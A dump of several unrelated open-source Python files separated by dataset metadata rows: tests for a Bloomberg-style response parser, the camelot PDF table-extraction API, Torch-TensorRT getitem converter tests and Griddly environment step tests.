test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "CO1 Comdty"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
FUT_CHAIN[] = {
FUT_CHAIN = {
Security Description = "CON7 Comdty"
}
FUT_CHAIN = {
Security Description = "COQ7 Comdty"
}
}
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "CO1 Comdty",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"FUT_CHAIN":
[{"FUT_CHAIN": {"Security Description": "CON7 Comdty"}}, # NOQA
{"FUT_CHAIN": {"Security Description": "COQ7 Comdty"}}] # NOQA
}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_reference_data_response_time(self):
test_str = """
ReferenceDataResponse = {
securityData[] = {
securityData = {
security = "AUD Curncy"
eidData[] = {
}
fieldExceptions[] = {
}
sequenceNumber = 0
fieldData = {
TIME = "18:33:47"
LAST_PRICE_TIME_TODAY = 18:33:47.000
}
}
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"ReferenceDataResponse":
{"securityData":
[{"securityData":
{"security": "AUD Curncy",
"eidData": [],
"fieldExceptions": [],
"sequenceNumber": 0,
"fieldData": {"TIME": "18:33:47",
"LAST_PRICE_TIME_TODAY": "18:33:47.000"}
}
}
]
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_invalid_date(self):
test_str = """
HistoricalDataResponse = {
responseError = {
source = "bbdbh4"
code = 31
category = "BAD_ARGS"
message = "Invalid end date specified [nid:247] "
subcategory = "INVALID_END_DATE"
}
}
"""
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"responseError": {"source": "bbdbh4",
"code": 31,
"category": "BAD_ARGS",
"message": "Invalid end date specified [nid:247] ", # NOQA
"subcategory": "INVALID_END_DATE"}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_invalid_security(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "UNKNOWN Equity"
eidData[] = {
}
sequenceNumber = 0
securityError = {
source = "247::bbdbh2"
code = 15
category = "BAD_SEC"
message = "Unknown/Invalid securityInvalid Security [nid:247] "
subcategory = "INVALID_SECURITY"
}
fieldExceptions[] = {
}
fieldData[] = {
}
}
}
""" # NOQA
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "UNKNOWN Equity",
"eidData": [],
"sequenceNumber": 0,
"securityError": {"source": "247::bbdbh2",
"code": 15,
"category": "BAD_SEC",
"message": "Unknown/Invalid securityInvalid Security [nid:247] ", # NOQA
"subcategory": "INVALID_SECURITY"},
"fieldExceptions": [],
"fieldData": []
}
}
}]
self.assertEqual(res, exp_res)
def test_historical_data_response_invalid_field(self):
test_str = """
HistoricalDataResponse = {
securityData = {
security = "SPY US Equity"
eidData[] = {
}
sequenceNumber = 0
fieldExceptions[] = {
fieldExceptions = {
fieldId = "UNKNOWN"
errorInfo = {
source = "247::bbdbh3"
code = 1
category = "BAD_FLD"
message = "Invalid field"
subcategory = "NOT_APPLICABLE_TO_HIST_DATA"
}
}
}
fieldData[] = {
fieldData = {
date = 2015-06-29
PX_LAST = 205.420000
}
fieldData = {
date = 2015-06-30
PX_LAST = 205.850000
}
}
}
}
""" # NOQA
res = parser.to_dict_list(test_str)
exp_res = [{"HistoricalDataResponse":
{"securityData":
{"security": "SPY US Equity",
"eidData": [],
"sequenceNumber": 0,
"fieldExceptions": [{"fieldExceptions":
{"fieldId": "UNKNOWN",
"errorInfo": {"source": "247::bbdbh3", # NOQA
"code": 1,
"category": "BAD_FLD",
"message": "Invalid field", # NOQA
"subcategory": "NOT_APPLICABLE_TO_HIST_DATA"} # NOQA
}
}],
"fieldData": [{"fieldData": {"date": "2015-06-29", "PX_LAST": 205.42}}, # NOQA
{"fieldData": {"date": "2015-06-30", "PX_LAST": 205.85}}] # NOQA
}
}
}]
self.assertEqual(res, exp_res)
| 33.850891 | 133 | 0.363353 | 1,251 | 20,886 | 5.848122 | 0.107114 | 0.032531 | 0.051121 | 0.057135 | 0.957217 | 0.926873 | 0.90596 | 0.897348 | 0.876709 | 0.864954 | 0 | 0.065685 | 0.534952 | 20,886 | 616 | 134 | 33.905844 | 0.687532 | 0.004979 | 0 | 0.563478 | 0 | 0 | 0.56421 | 0.041908 | 0 | 0 | 0 | 0 | 0.029565 | 1 | 0.033043 | false | 0.003478 | 0.003478 | 0 | 0.038261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c4b6c76c44fc2dab58695cd7d3c7884b6ce02a69 | 179 | py | Python | matrix/geolocator/main.py | lsbloo/DMatrix | 226b4f2e927c3a6b32a266ad567918342b51f0de | [
"MIT"
] | null | null | null | matrix/geolocator/main.py | lsbloo/DMatrix | 226b4f2e927c3a6b32a266ad567918342b51f0de | [
"MIT"
] | null | null | null | matrix/geolocator/main.py | lsbloo/DMatrix | 226b4f2e927c3a6b32a266ad567918342b51f0de | [
"MIT"
] | null | null | null | from model import Address
from model import Locate
from reader.hcsv import generate_csv_address,reader_csv_address
#generate_csv_address(Address.get_all())
reader_csv_address()
| 22.375 | 63 | 0.854749 | 27 | 179 | 5.333333 | 0.407407 | 0.277778 | 0.208333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089385 | 179 | 7 | 64 | 25.571429 | 0.883436 | 0.217877 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
483b1813dda655bb08163d939b4d58cf6fc3d94e | 9,497 | py | Python | camelot/io.py | ilersich/camelot | ce9aeb158ebd4524d68c51c1848af0fff08d5ed8 | [
"MIT"
] | null | null | null | camelot/io.py | ilersich/camelot | ce9aeb158ebd4524d68c51c1848af0fff08d5ed8 | [
"MIT"
] | null | null | null | camelot/io.py | ilersich/camelot | ce9aeb158ebd4524d68c51c1848af0fff08d5ed8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import warnings
from .handlers import PDFHandler, PDFHandler_inMem
from .utils import validate_input, remove_extra
def read_pdf(
filepath,
pages="1",
password=None,
flavor="lattice",
suppress_stdout=False,
layout_kwargs={},
**kwargs
):
"""Read PDF and return extracted tables.
Note: kwargs annotated with ^ can only be used with flavor='stream'
and kwargs annotated with * can only be used with flavor='lattice'.
Parameters
----------
filepath : str
Filepath or URL of the PDF file.
pages : str, optional (default: '1')
Comma-separated page numbers.
Example: '1,3,4' or '1,4-end' or 'all'.
password : str, optional (default: None)
Password for decryption.
flavor : str (default: 'lattice')
The parsing method to use ('lattice' or 'stream').
Lattice is used by default.
suppress_stdout : bool, optional (default: True)
Print all logs and warnings.
layout_kwargs : dict, optional (default: {})
A dict of `pdfminer.layout.LAParams <https://github.com/euske/pdfminer/blob/master/pdfminer/layout.py#L33>`_ kwargs.
table_areas : list, optional (default: None)
List of table area strings of the form x1,y1,x2,y2
where (x1, y1) -> left-top and (x2, y2) -> right-bottom
in PDF coordinate space.
columns^ : list, optional (default: None)
List of column x-coordinates strings where the coordinates
are comma-separated.
split_text : bool, optional (default: False)
Split text that spans across multiple cells.
flag_size : bool, optional (default: False)
Flag text based on font size. Useful to detect
super/subscripts. Adds <s></s> around flagged text.
strip_text : str, optional (default: '')
Characters that should be stripped from a string before
assigning it to a cell.
row_tol^ : int, optional (default: 2)
Tolerance parameter used to combine text vertically,
to generate rows.
column_tol^ : int, optional (default: 0)
Tolerance parameter used to combine text horizontally,
to generate columns.
process_background* : bool, optional (default: False)
Process background lines.
line_scale* : int, optional (default: 15)
Line size scaling factor. The larger the value the smaller
the detected lines. Making it very large will lead to text
being detected as lines.
copy_text* : list, optional (default: None)
{'h', 'v'}
Direction in which text in a spanning cell will be copied
over.
shift_text* : list, optional (default: ['l', 't'])
{'l', 'r', 't', 'b'}
Direction in which text in a spanning cell will flow.
line_tol* : int, optional (default: 2)
Tolerance parameter used to merge close vertical and horizontal
lines.
joint_tol* : int, optional (default: 2)
Tolerance parameter used to decide whether the detected lines
and points lie close to each other.
threshold_blocksize* : int, optional (default: 15)
Size of a pixel neighborhood that is used to calculate a
threshold value for the pixel: 3, 5, 7, and so on.
For more information, refer `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
threshold_constant* : int, optional (default: -2)
Constant subtracted from the mean or weighted mean.
Normally, it is positive but may be zero or negative as well.
For more information, refer `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
iterations* : int, optional (default: 0)
Number of times for erosion/dilation is applied.
For more information, refer `OpenCV's dilate <https://docs.opencv.org/2.4/modules/imgproc/doc/filtering.html#dilate>`_.
resolution* : int, optional (default: 300)
Resolution used for PDF to PNG conversion.
Returns
-------
tables : camelot.core.TableList
"""
if flavor not in ["lattice", "stream"]:
raise NotImplementedError(
"Unknown flavor specified." " Use either 'lattice' or 'stream'"
)
with warnings.catch_warnings():
if suppress_stdout:
warnings.simplefilter("ignore")
validate_input(kwargs, flavor=flavor)
p = PDFHandler(filepath, pages=pages, password=password)
kwargs = remove_extra(kwargs, flavor=flavor)
tables = p.parse(
flavor=flavor,
suppress_stdout=suppress_stdout,
layout_kwargs=layout_kwargs,
**kwargs
)
return tables
def read_pdf_inMem(
file,
pages="1",
password=None,
flavor="lattice",
suppress_stdout=False,
layout_kwargs={},
**kwargs
):
"""Read PDF and return extracted tables.
Note: kwargs annotated with ^ can only be used with flavor='stream'
and kwargs annotated with * can only be used with flavor='lattice'.
Parameters
----------
filepath : str
Filepath or URL of the PDF file.
pages : str, optional (default: '1')
Comma-separated page numbers.
Example: '1,3,4' or '1,4-end' or 'all'.
password : str, optional (default: None)
Password for decryption.
flavor : str (default: 'lattice')
The parsing method to use ('lattice' or 'stream').
Lattice is used by default.
suppress_stdout : bool, optional (default: True)
Print all logs and warnings.
layout_kwargs : dict, optional (default: {})
A dict of `pdfminer.layout.LAParams <https://github.com/euske/pdfminer/blob/master/pdfminer/layout.py#L33>`_ kwargs.
table_areas : list, optional (default: None)
List of table area strings of the form x1,y1,x2,y2
where (x1, y1) -> left-top and (x2, y2) -> right-bottom
in PDF coordinate space.
columns^ : list, optional (default: None)
List of column x-coordinates strings where the coordinates
are comma-separated.
split_text : bool, optional (default: False)
Split text that spans across multiple cells.
flag_size : bool, optional (default: False)
Flag text based on font size. Useful to detect
super/subscripts. Adds <s></s> around flagged text.
strip_text : str, optional (default: '')
Characters that should be stripped from a string before
assigning it to a cell.
row_tol^ : int, optional (default: 2)
Tolerance parameter used to combine text vertically,
to generate rows.
column_tol^ : int, optional (default: 0)
Tolerance parameter used to combine text horizontally,
to generate columns.
process_background* : bool, optional (default: False)
Process background lines.
line_scale* : int, optional (default: 15)
Line size scaling factor. The larger the value the smaller
the detected lines. Making it very large will lead to text
being detected as lines.
copy_text* : list, optional (default: None)
{'h', 'v'}
Direction in which text in a spanning cell will be copied
over.
shift_text* : list, optional (default: ['l', 't'])
{'l', 'r', 't', 'b'}
Direction in which text in a spanning cell will flow.
line_tol* : int, optional (default: 2)
Tolerance parameter used to merge close vertical and horizontal
lines.
joint_tol* : int, optional (default: 2)
Tolerance parameter used to decide whether the detected lines
and points lie close to each other.
threshold_blocksize* : int, optional (default: 15)
Size of a pixel neighborhood that is used to calculate a
threshold value for the pixel: 3, 5, 7, and so on.
For more information, refer `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
threshold_constant* : int, optional (default: -2)
Constant subtracted from the mean or weighted mean.
Normally, it is positive but may be zero or negative as well.
For more information, refer `OpenCV's adaptiveThreshold <https://docs.opencv.org/2.4/modules/imgproc/doc/miscellaneous_transformations.html#adaptivethreshold>`_.
iterations* : int, optional (default: 0)
Number of times for erosion/dilation is applied.
For more information, refer `OpenCV's dilate <https://docs.opencv.org/2.4/modules/imgproc/doc/filtering.html#dilate>`_.
resolution* : int, optional (default: 300)
Resolution used for PDF to PNG conversion.
Returns
-------
tables : camelot.core.TableList
"""
if flavor not in ["lattice", "stream"]:
raise NotImplementedError(
"Unknown flavor specified." " Use either 'lattice' or 'stream'"
)
with warnings.catch_warnings():
if suppress_stdout:
warnings.simplefilter("ignore")
validate_input(kwargs, flavor=flavor)
p = PDFHandler_inMem(file, pages=pages, password=password)
kwargs = remove_extra(kwargs, flavor=flavor)
tables = p.parse(
flavor=flavor,
suppress_stdout=suppress_stdout,
layout_kwargs=layout_kwargs,
**kwargs
)
return tables
| 40.759657 | 169 | 0.65526 | 1,200 | 9,497 | 5.126667 | 0.209167 | 0.102406 | 0.052666 | 0.027308 | 0.973992 | 0.973992 | 0.973992 | 0.973992 | 0.973992 | 0.973992 | 0 | 0.011127 | 0.252395 | 9,497 | 232 | 170 | 40.935345 | 0.855352 | 0.756239 | 0 | 0.763636 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036364 | false | 0.072727 | 0.054545 | 0 | 0.127273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
484d8d562220b8cf8f24c7917cd8ed565c492463 | 5,243 | py | Python | py/torch_tensorrt/fx/test/converters/acc_op/test_getitem.py | NVIDIA/Torch-TensorRT | 1a22204fecec690bc3c2a318dab4f57b98c57f05 | [
"BSD-3-Clause"
] | 430 | 2021-11-09T08:08:01.000Z | 2022-03-31T10:13:45.000Z | py/torch_tensorrt/fx/test/converters/acc_op/test_getitem.py | NVIDIA/Torch-TensorRT | 1a22204fecec690bc3c2a318dab4f57b98c57f05 | [
"BSD-3-Clause"
] | 257 | 2021-11-09T07:17:03.000Z | 2022-03-31T20:29:31.000Z | py/torch_tensorrt/fx/test/converters/acc_op/test_getitem.py | NVIDIA/Torch-TensorRT | 1a22204fecec690bc3c2a318dab4f57b98c57f05 | [
"BSD-3-Clause"
] | 68 | 2021-11-10T05:03:22.000Z | 2022-03-22T17:07:32.000Z | import torch
import torch.nn as nn
import torch_tensorrt.fx.tracer.acc_tracer.acc_ops as acc_ops
from parameterized import parameterized
from torch.testing._internal.common_utils import run_tests
from torch_tensorrt.fx.tools.common_fx2trt import AccTestCase, InputTensorSpec
class TestGetitemConverter(AccTestCase):
@parameterized.expand(
[
("slice_batch_dim", slice(None, None, None)),
("slice_basic", (slice(None, None, None), slice(0, 3, 2))),
("slice_full", (slice(None, None, None), slice(0, 10, 3))),
("ellipsis", (slice(None, None, None), ..., slice(0, 3, 2))),
(
"slice_all_none",
(slice(None, None, None), slice(None, None, None)),
),
(
"slice_start_none",
(slice(None, None, None), slice(None, 2, 1)),
),
("slice_end_none", (slice(None, None, None), slice(1, None, 1))),
(
"slice_step_none",
(slice(None, None, None), slice(0, 3, None)),
),
("slice_neg_idx", (slice(None, None, None), -1)),
("slice_neg_slice", (slice(None, None, None), slice(-8, -2, 3))),
("multi_dim", (slice(None, None, None), 0, 1)),
(
"slice_multi_dim",
(slice(None, None, None), slice(0, 3, 2), slice(1, -1, 3)),
),
(
"none",
(slice(None, None, None), None, slice(1, -1, 3), 1),
),
(
"slice_zero_slice",
(slice(None, None, None), slice(None, None, None), slice(0, 0, None)),
),
]
)
def test_getitem(self, _, idx):
class Getitem(nn.Module):
def __init__(self, idx):
super().__init__()
self.idx = idx
def forward(self, x):
x = x + x
return x[self.idx]
inputs = [torch.randn(2, 10, 10, 10)]
self.run_test(Getitem(idx), inputs, expected_ops={acc_ops.getitem})
@parameterized.expand(
[
("slice_batch_dim", slice(None, None, None)),
("ellipsis", (slice(None, None, None), ..., slice(0, -3, 2))),
(
"slice_all_none",
(slice(None, None, None), slice(None, None, None)),
),
(
"slice_end_none",
(slice(None, None, None), slice(None, None, None), slice(1, None, 1)),
),
(
"slice_step_none",
(slice(None, None, None), slice(None, None, None), slice(0, 3, None)),
),
("slice_neg_idx", (slice(None, None, None), -1, slice(None, None, None))),
(
"slice_neg_slice",
(slice(None, None, None), slice(None, None, None), slice(-8, -2, 3)),
),
("multi_dim", (slice(None, None, None), 0, 1)),
(
"slice_multi_dim",
(slice(None, None, None), slice(0, 3, 2), slice(1, -1, 3)),
),
(
"none",
(slice(None, None, None), None, slice(1, -1, 3)),
),
]
)
def test_getitem_with_dynamic_shape(self, _, idx):
class Getitem(nn.Module):
def __init__(self, idx):
super().__init__()
self.idx = idx
def forward(self, x):
x = x + x
return x[self.idx]
input_specs = [
InputTensorSpec(
shape=(-1, 256, 256),
dtype=torch.float32,
shape_ranges=[((1, 256, 256), (3, 256, 256), (5, 256, 256))],
),
]
self.run_test_with_dynamic_shape(
Getitem(idx), input_specs, expected_ops={acc_ops.getitem}
)
@parameterized.expand(
[
("slice_batch_dim", slice(None, None, None)),
("ellipsis", (slice(None, None, None), ..., slice(0, -3, 2))),
(
"slice_all_none",
(slice(None, None, None), slice(None, None, None)),
),
(
"slice_end_none",
(slice(None, None, None), slice(None, None, None), slice(1, None, 1)),
),
(
"slice_step_none",
(slice(None, None, None), slice(None, None, None), slice(0, 3, None)),
),
]
)
def test_getitem_with_multi_dynamic_shape(self, _, idx):
class Getitem(nn.Module):
def __init__(self, idx):
super().__init__()
self.idx = idx
def forward(self, x):
x = x + x
return x[self.idx]
input_specs = [
InputTensorSpec(
shape=(-1, -1, 256),
dtype=torch.float32,
shape_ranges=[((1, 128, 256), (3, 192, 256), (5, 256, 256))],
),
]
self.run_test_with_dynamic_shape(
Getitem(idx), input_specs, expected_ops={acc_ops.getitem}
)
if __name__ == "__main__":
run_tests()
| 34.045455 | 86 | 0.456418 | 562 | 5,243 | 4.044484 | 0.129893 | 0.281566 | 0.216454 | 0.291685 | 0.802904 | 0.797624 | 0.785306 | 0.743951 | 0.733392 | 0.698636 | 0 | 0.040566 | 0.393477 | 5,243 | 153 | 87 | 34.267974 | 0.674214 | 0 | 0 | 0.560284 | 0 | 0 | 0.070761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0 | 0.042553 | 0 | 0.156028 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
486ffa7196c710e898f79ad58a2522af5556cbf7 | 30,159 | py | Python | python/tests/step_test.py | maichmueller/Griddly | 25b978a08f13226de2831d0941af0f37fea12718 | [
"MIT"
] | 93 | 2020-05-29T14:36:46.000Z | 2022-03-28T02:58:04.000Z | python/tests/step_test.py | maichmueller/Griddly | 25b978a08f13226de2831d0941af0f37fea12718 | [
"MIT"
] | 35 | 2020-07-22T16:43:03.000Z | 2022-03-30T19:50:20.000Z | python/tests/step_test.py | maichmueller/Griddly | 25b978a08f13226de2831d0941af0f37fea12718 | [
"MIT"
] | 13 | 2020-07-22T08:24:28.000Z | 2022-01-28T06:58:38.000Z | import numpy as np
import gym
import pytest
from griddly import GymWrapperFactory, gd
@pytest.fixture
def test_name(request):
return request.node.name
def build_test_env(test_name, yaml_file):
wrapper_factory = GymWrapperFactory()
wrapper_factory.build_gym_from_yaml(
test_name,
yaml_file,
global_observer_type=gd.ObserverType.VECTOR,
player_observer_type=gd.ObserverType.VECTOR,
)
env = gym.make(f'GDY-{test_name}-v0')
env.reset()
return env
def get_object_state(env, object_name, player=1):
state = env.get_state()
for object in state['Objects']:
if object['Name'] == object_name and object['PlayerId'] == player:
return object
def test_step_SinglePlayer_SingleActionType_SingleValue(test_name):
"""
Assuming there is a single avatar
Action is in form env.step(actionId)
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SingleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == ()
assert env.action_space.n == 5
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step(1)
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
sample = env.action_space.sample()
assert isinstance(sample, int)
def test_step_SinglePlayer_SingleActionType_ArrayValue(test_name):
"""
There is an avatar
Action is in form env.step([actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SingleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == ()
assert env.action_space.n == 5
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
sample = env.action_space.sample()
assert isinstance(sample, int)
def test_step_SinglePlayer_SelectSource_SingleActionType(test_name):
"""
There is no avatar
env.step([x, y, actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_SingleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == (3,)
assert np.all(env.action_space.nvec == [5, 6, 5])
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([2, 3, 1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
sample = env.action_space.sample()
assert sample.shape == (3,)
def test_step_SinglePlayer_SelectSource_SingleActionType_MultipleAction(test_name):
"""
There is no avatar
Player performing multiple actions in a single step
env.step([
[x1, y1, actionId1],
[x2, y2, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_SingleActionType_MultipleAction.yaml"
)
assert env.observation_space.shape == (2, 5, 6)
assert env.global_observation_space.shape == (2, 5, 6)
assert env.action_space.shape == (3,)
assert np.all(env.action_space.nvec == [5, 6, 5])
obs, reward, done, info = env.step([
[2, 3, 1],
[1, 4, 3],
])
assert obs.shape == (2, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar1_state = get_object_state(env, 'avatar1')
avatar2_state = get_object_state(env, 'avatar2')
assert avatar1_state['Location'] == [1, 3]
assert avatar2_state['Location'] == [2, 4]
object_names = env.game.get_object_names()
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[avartar1_id, 1, 3] == 1
assert obs[avartar2_id, 2, 4] == 1
sample = env.action_space.sample()
assert sample.shape == (3,)
def test_step_SinglePlayer_MultipleActionType(test_name):
"""
There is an avatar
Action is in form env.step([action_type, actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_MultipleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == (2,)
assert np.all(env.action_space.nvec == [2, 5])
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([0, 1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
obs, reward, done, info = env.step([1, 3])
assert obs.shape == (1, 5, 6)
assert reward == 1
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [2, 3]
sample = env.action_space.sample()
assert sample.shape == (2,)
def test_step_SinglePlayer_SelectSource_MultipleActionType(test_name):
"""
There is no avatar
env.step([x, y, action_type, actionId])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_MultipleActionType.yaml"
)
assert env.observation_space.shape == (1, 5, 6)
assert env.global_observation_space.shape == (1, 5, 6)
assert env.action_space.shape == (4,)
assert np.all(env.action_space.nvec == [5, 6, 2, 5])
assert env.game.get_object_names() == ['avatar']
obs, reward, done, info = env.step([2, 3, 0, 1])
assert obs.shape == (1, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [1, 3]
obs, reward, done, info = env.step([1, 3, 1, 3])
assert obs.shape == (1, 5, 6)
assert reward == 1
assert not done
assert info == {}
avatar_state = get_object_state(env, 'avatar')
assert avatar_state['Location'] == [2, 3]
sample = env.action_space.sample()
assert sample.shape == (4,)
def test_step_SinglePlayer_SelectSource_MultipleActionType_MultipleAction(test_name):
"""
There is no avatar
Player performing multiple actions in a single step
env.step([
[x1, y1, action_type, actionId1],
[x2, y2, action_type, actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_SinglePlayer_SelectSource_MultipleActionType_MultipleAction.yaml"
)
assert env.observation_space.shape == (2, 5, 6)
assert env.global_observation_space.shape == (2, 5, 6)
assert env.action_space.shape == (4,)
assert np.all(env.action_space.nvec == [5, 6, 2, 5])
obs, reward, done, info = env.step([
[2, 3, 0, 1],
[1, 4, 0, 1]
])
assert obs.shape == (2, 5, 6)
assert reward == 0
assert not done
assert info == {}
avatar1_state = get_object_state(env, 'avatar1')
avatar2_state = get_object_state(env, 'avatar2')
assert avatar1_state['Location'] == [1, 3]
assert avatar2_state['Location'] == [0, 4]
object_names = env.game.get_object_names()
avartar1_id = object_names.index('avatar1')
avartar2_id = object_names.index('avatar2')
assert obs[avartar1_id, 1, 3] == 1
assert obs[avartar2_id, 0, 4] == 1
obs, reward, done, info = env.step([
[1, 3, 1, 3],
[0, 4, 1, 3]
])
assert obs.shape == (2, 5, 6)
assert reward == 2
assert not done
assert info == {}
avatar1_state = get_object_state(env, 'avatar1')
avatar2_state = get_object_state(env, 'avatar2')
assert avatar1_state['Location'] == [2, 3]
assert avatar2_state['Location'] == [1, 4]
sample = env.action_space.sample()
assert sample.shape == (4,)
def test_step_MultiplePlayer_SingleActionType_SingleValue(test_name):
"""
There is an avatar
Multiple players
env.step([
actionId_player1,
actionId_player2
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
1,
3,
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
def test_step_MultiplePlayer_SingleActionType_ArrayValue(test_name):
"""
There no avatar, multiple players
env.step([
[actionId1],
[actionId2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_SingleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == ()
assert env.action_space[p].n == 5
obs, reward, done, info = env.step([
[1],
[3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 0
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
def test_step_MultiplePlayer_MultipleActionType(test_name):
"""
There is an avatar
Multiple players
env.step([
[action_type, actionId_player1],
[action_type, actionId_player2]
])
"""
env = build_test_env(
test_name,
"tests/gdy/test_step_MultiPlayer_MultipleActionType.yaml"
)
assert len(env.observation_space) == 2
assert len(env.action_space) == 2
assert env.global_observation_space.shape == (1, 5, 6)
assert env.game.get_object_names() == ['avatar']
for p in range(env.player_count):
assert env.observation_space[p].shape == (1, 5, 6)
assert env.action_space[p].shape == (2,)
assert np.all(env.action_space[p].nvec == [2, 5])
obs, reward, done, info = env.step([
[0, 1],
[1, 3],
])
assert obs[0].shape == (1, 5, 6)
assert reward[0] == 0
assert obs[1].shape == (1, 5, 6)
assert reward[1] == 1
assert not done
assert info == {}
player1_avatar_state = get_object_state(env, 'avatar', player=1)
player2_avatar_state = get_object_state(env, 'avatar', player=2)
assert player1_avatar_state['Location'] == [0, 3]
assert player2_avatar_state['Location'] == [4, 3]
sample = env.action_space.sample()
assert len(sample) == 2
assert sample[0].shape == (2,)
assert sample[1].shape == (2,)
